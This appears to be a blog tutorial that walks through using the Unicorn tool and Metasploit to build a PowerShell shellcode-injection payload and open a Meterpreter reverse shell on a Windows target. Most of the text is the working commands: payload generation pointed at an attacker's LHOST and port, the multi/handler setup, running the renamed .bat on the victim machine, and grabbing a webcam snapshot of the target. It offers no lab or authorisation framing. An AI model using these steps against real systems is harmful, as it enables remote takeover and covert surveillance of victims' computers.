Unicorn is a simple tool for using a PowerShell downgrade attack and inject shellcode straight into memory. Based on Matthew Graeber’s powershell attacks and the powershell bypass technique presented by David Kennedy (TrustedSec) and Josh Kelly at Defcon 18. https://www.trustedsec.com
Welcome back today we will talk about Powershell downgrade attacks using uniscan and inject shellcode straight into memory.
To start we will need to download Unicorn (Credits trustedsec).
Now we have downloaded unicorn we now need to make the script executable.
# chmod +x unicorn.py
Now we can start unicorn using the following commands.
# python unicorn.py
Now unicorn is installed we now need to create a payload to create a payload we use command (replace LHOST to your own LHOST).
If you don’t know what you LHOST is you can use ifconfig to look up network information.
# python unicorn.py windows/meterpreterpreter/reverse_tcp 192.168.43.49 443
Unicorn has now successfully generated our payload. We need to set a reverse handler up to manage connections between the attacker and target machine.
Open up a new command terminal and load up metasploit.
Next we set our multi handler.
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
Now we need to set our LHOST.
set lhost 192.168.43.49
set lport 443
msf exploit(handler) > exploit
Now we need to send our payload to the target machine. Simply paste the powershell_attacks.txt command in any command prompt window or where you have the ability to call the powershell executable and it will give a shell back to you. This attack also supports windows/download_exec for a payload method instead of just Meterpreter payloads.
I will rename powershell_attack.bat and execute it on the target machine.
As you can see we have now established a reverse shell between the attacker and target machine.
we will now take a screen shot from the targets webcam.
meterpreter > webcam_snap
Metasploit is a powerful framework it includes lots of modules and exploits you may also like to read.
- Distributed Hash Cracking Hashcat Hashtopolis Tutorial - 30th March 2020
- Cracking Password Hashes with Hashcat Rule-based attack - 27th March 2020
- GPU Fan Control NVIDIA Graphics Cards Kali Linux - 26th March 2020